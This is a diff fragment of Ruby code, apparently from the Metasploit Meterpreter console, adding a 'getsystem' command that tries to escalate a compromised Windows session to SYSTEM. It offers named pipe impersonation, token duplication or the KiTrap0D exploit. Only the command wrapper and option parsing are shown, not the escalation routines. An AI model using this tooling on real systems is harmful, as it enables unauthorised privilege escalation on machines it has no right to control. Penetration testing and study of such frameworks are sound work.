+	ELEVATE_TECHNIQUE_VULN_KITRAP0D			= 4
+	ELEVATE_TECHNIQUE_DESCRIPTION = [ 	"All techniques available",
+										"Service - Named Pipe Impersonation (In Memory/Admin)",
+										"Service - Named Pipe Impersonation (Dropper/Admin)",
+										"Service - Token Duplication (In Memory/Admin)",
+										"Exploit - KiTrap0D (In Memory/User)"
+									]
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"getsystem" => "Attempt to elevate your privilege to that of local system."
+		}
+	end
+	#
+	# Name for this dispatcher.
+	#
+	def name
+		"Priv: Elevate"
+	end
+	#
+	# Attempt to elevate the meterpreter to that of local system.
+	#
+	def cmd_getsystem( *args )
+		technique = ELEVATE_TECHNIQUE_ANY
+		desc = ""
+		ELEVATE_TECHNIQUE_DESCRIPTION.each_index { |i| desc += "\n\t\t#{i} : #{ELEVATE_TECHNIQUE_DESCRIPTION[i]}" }
+		getsystem_opts = Rex::Parser::Arguments.new(
+			"-h" => [ false, "Help Banner." ],
+			"-t" => [ true, "The technique to use. (Default to \'#{technique}\')." + desc ]
+		)
+		getsystem_opts.parse(args) { | opt, idx, val |
+			case opt
+				when "-h"
+					print_line( "Usage: getsystem [options]\n" )
+					print_line( "Attempt to elevate your privilege to that of local system." )
+					print_line( getsystem_opts.usage )
+					return
+				when "-t"
+					technique = val.to_i
+			end
+		}
+		if( technique < 0 or technique >= ELEVATE_TECHNIQUE_DESCRIPTION.length )
+			print_error( "Technique '#{technique}' is out of range." );
+			return false;
+		end
+		result = client.priv.getsystem( technique )
+		# got system?
+		if result[0]
+			print_line( "...got system (via technique #{result[1]})." );
+		else
+			print_line( "...failed to get system." );
+		end
+		return result
+	end
+end
+end
+end
+end
+end